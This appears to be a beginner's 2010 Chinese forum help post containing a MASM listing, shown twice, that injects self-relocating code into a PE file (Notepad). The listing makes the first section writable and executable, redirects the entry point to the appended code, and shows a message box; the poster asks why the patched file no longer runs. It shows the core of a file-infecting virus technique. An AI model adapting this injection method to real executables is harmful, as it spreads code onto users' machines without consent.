菜鸟求助
发表于: 2010-4-19 23:46 2057
.386                                    ; 32-bit x86, MASM syntax
.model flat,stdcall                     ; flat model; Win32 API calls use stdcall
option casemap:none
include include\windows.inc             ; IMAGE_NT_HEADERS / IMAGE_SECTION_HEADER layouts come from here
include include\kernel32.inc
include include\user32.inc
includelib lib\kernel32.lib
includelib lib\user32.lib
.data
hFile dd 0                              ; file handle returned by _lopen
szCaption db "test",0
szMessage db "success",0
szMessage1 db "fail",0                  ; not referenced anywhere in this listing
szFileName db "test.exe",0              ; target PE file on disk
szUser32 db "user32.dll",0
szApiName db "MessageBoxA",0
.code
; Entry point of the patcher. Reads the first 1000h bytes of szFileName into a
; stack buffer, edits the first section header and AddressOfEntryPoint in that
; buffer, appends the bytes between _m1 and _m2 to the file, then writes the
; buffer back to offset 0 and shows a "success" box.
; Analyst note: the header edits below are the fields a file-infection scanner
; keys on — a section flagged code+execute+read+write+shared, an entry point
; moved to the end of a section, and appended self-relocating code that
; resolves its import by hand.
_main:
push 02h                                ; _lopen mode 2 (OF_READWRITE)
push offset szFileName \\该文件就是记事本
call _lopen
mov hFile,eax
sub esp,1000h                           ; 1000h-byte stack buffer for the file header
mov edi,esp                             ; edi = buffer base
push 1000h
push edi
push hFile
call _lread                             ; read the first 1000h bytes of the file
mov eax,[edi+3ch]                       ; IMAGE_DOS_HEADER.e_lfanew (offset of the PE signature)
add edi,eax                             ; edi = IMAGE_NT_HEADERS inside the buffer
mov ebx,edi
add ebx,sizeof IMAGE_NT_HEADERS         ; ebx = first IMAGE_SECTION_HEADER
assume ebx:ptr IMAGE_SECTION_HEADER,edi:ptr IMAGE_NT_HEADERS
mov [ebx].Characteristics,0f0000020h    ; CNT_CODE|MEM_SHARED|MEM_EXECUTE|MEM_READ|MEM_WRITE on the first section
mov eax,[ebx].Misc.VirtualSize          ; eax = current VirtualSize of the first section
mov ecx,eax
add ecx,[ebx].VirtualAddress            ; ecx = RVA just past the section's current data
mov [edi].OptionalHeader.AddressOfEntryPoint,ecx ; entry point now points at the appended code
add [ebx].Misc.VirtualSize,offset _m2-offset _m1 ; grow VirtualSize by the payload length
add eax,[ebx].PointerToRawData          ; eax = file offset where the payload is written
push FILE_BEGIN
push eax
push hFile
call _llseek                            ; seek to that file offset
push offset _m2-offset _m1              ; payload byte count
push offset _m1                         ; payload start (code + data between _m1 and _m2)
push hFile
call _lwrite                            ; append the payload to the file
push FILE_BEGIN
push 0
push hFile
call _llseek                            ; back to offset 0
push 1000h
push esp                                ; lpBuffer argument = value of esp at this point
push hFile
call _lwrite                            ; write the modified header block back
add esp,1000h                           ; release the stack buffer
push offset szUser32
call LoadLibraryA
push offset szApiName
push eax
call GetProcAddress                     ; eax = address of MessageBoxA, resolved at run time
mov aMessageBoxA,eax                    ; stored inside the payload region so the appended code can use it
push MB_OK or MB_ICONINFORMATION
push offset szCaption
push offset szMessage
push 0
call MessageBoxA                        ; "success" box shown by the patcher itself
ret
; ---- payload: bytes from _m1 to _m2 are copied verbatim into the target file ----
_m1:
call _r                                 ; call/pop pair: ebp = run-time address of _r
_r:
pop ebp
sub ebp,offset _r                       ; ebp = delta between link-time and run-time addresses
push MB_OK or MB_ICONINFORMATION
lea eax,szMsg2[ebp]                     ; delta-relocated address of szMsg2
push eax
lea eax,szMsg1[ebp]                     ; delta-relocated address of szMsg1
push eax
push 0
call aMessageBoxA[ebp]                  ; indirect call through the address stored by _main
ret                                     ; end of payload code
aMessageBoxA dd 0                       ; filled in by _main; travels with the payload bytes
szMsg1 db "你确定要退出么?",0            ; runtime strings, kept byte-for-byte as the program emits them
szMsg2 db "出错",0
_m2:
end _main
把后面那部分代码注入记事本后，记事本显示“不是 WIN32 程序”。请问错在哪里？我刚学，估计有很多错误，主要想知道是不是节表的数据填错了，还是别的什么问题。
.model flat,stdcall                     ; flat model; Win32 API calls use stdcall
option casemap:none
include include\windows.inc             ; IMAGE_NT_HEADERS / IMAGE_SECTION_HEADER layouts come from here
include include\kernel32.inc
include include\user32.inc
includelib lib\kernel32.lib
includelib lib\user32.lib
.data
hFile dd 0                              ; file handle returned by _lopen
szCaption db "test",0
szMessage db "success",0
szMessage1 db "fail",0                  ; not referenced anywhere in this listing
szFileName db "test.exe",0              ; target PE file on disk
szUser32 db "user32.dll",0
szApiName db "MessageBoxA",0
.code
; Entry point of the patcher. Reads the first 1000h bytes of szFileName into a
; stack buffer, edits the first section header and AddressOfEntryPoint in that
; buffer, appends the bytes between _m1 and _m2 to the file, then writes the
; buffer back to offset 0 and shows a "success" box.
; Analyst note: the header edits below are the fields a file-infection scanner
; keys on — a section flagged code+execute+read+write+shared, an entry point
; moved to the end of a section, and appended self-relocating code that
; resolves its import by hand.
_main:
push 02h                                ; _lopen mode 2 (OF_READWRITE)
push offset szFileName \\该文件就是记事本
call _lopen
mov hFile,eax
sub esp,1000h                           ; 1000h-byte stack buffer for the file header
mov edi,esp                             ; edi = buffer base
push 1000h
push edi
push hFile
call _lread                             ; read the first 1000h bytes of the file
mov eax,[edi+3ch]                       ; IMAGE_DOS_HEADER.e_lfanew (offset of the PE signature)
add edi,eax                             ; edi = IMAGE_NT_HEADERS inside the buffer
mov ebx,edi
add ebx,sizeof IMAGE_NT_HEADERS         ; ebx = first IMAGE_SECTION_HEADER
assume ebx:ptr IMAGE_SECTION_HEADER,edi:ptr IMAGE_NT_HEADERS
mov [ebx].Characteristics,0f0000020h    ; CNT_CODE|MEM_SHARED|MEM_EXECUTE|MEM_READ|MEM_WRITE on the first section
mov eax,[ebx].Misc.VirtualSize          ; eax = current VirtualSize of the first section
mov ecx,eax
add ecx,[ebx].VirtualAddress            ; ecx = RVA just past the section's current data
mov [edi].OptionalHeader.AddressOfEntryPoint,ecx ; entry point now points at the appended code
add [ebx].Misc.VirtualSize,offset _m2-offset _m1 ; grow VirtualSize by the payload length
add eax,[ebx].PointerToRawData          ; eax = file offset where the payload is written
push FILE_BEGIN
push eax
push hFile
call _llseek                            ; seek to that file offset
push offset _m2-offset _m1              ; payload byte count
push offset _m1                         ; payload start (code + data between _m1 and _m2)
push hFile
call _lwrite                            ; append the payload to the file
push FILE_BEGIN
push 0
push hFile
call _llseek                            ; back to offset 0
push 1000h
push esp                                ; lpBuffer argument = value of esp at this point
push hFile
call _lwrite                            ; write the modified header block back
add esp,1000h                           ; release the stack buffer
push offset szUser32
call LoadLibraryA
push offset szApiName
push eax
call GetProcAddress                     ; eax = address of MessageBoxA, resolved at run time
mov aMessageBoxA,eax                    ; stored inside the payload region so the appended code can use it
push MB_OK or MB_ICONINFORMATION
push offset szCaption
push offset szMessage
push 0
call MessageBoxA                        ; "success" box shown by the patcher itself
ret
; ---- payload: bytes from _m1 to _m2 are copied verbatim into the target file ----
_m1:
call _r                                 ; call/pop pair: ebp = run-time address of _r
_r:
pop ebp
sub ebp,offset _r                       ; ebp = delta between link-time and run-time addresses
push MB_OK or MB_ICONINFORMATION
lea eax,szMsg2[ebp]                     ; delta-relocated address of szMsg2
push eax
lea eax,szMsg1[ebp]                     ; delta-relocated address of szMsg1
push eax
push 0
call aMessageBoxA[ebp]                  ; indirect call through the address stored by _main
ret                                     ; end of payload code
aMessageBoxA dd 0                       ; filled in by _main; travels with the payload bytes
szMsg1 db "你确定要退出么?",0            ; runtime strings, kept byte-for-byte as the program emits them
szMsg2 db "出错",0
_m2:
end _main
把后面那部分代码注入记事本后，记事本显示“不是 WIN32 程序”。请问错在哪里？我刚学，估计有很多错误，主要想知道是不是节表的数据填错了，还是别的什么问题。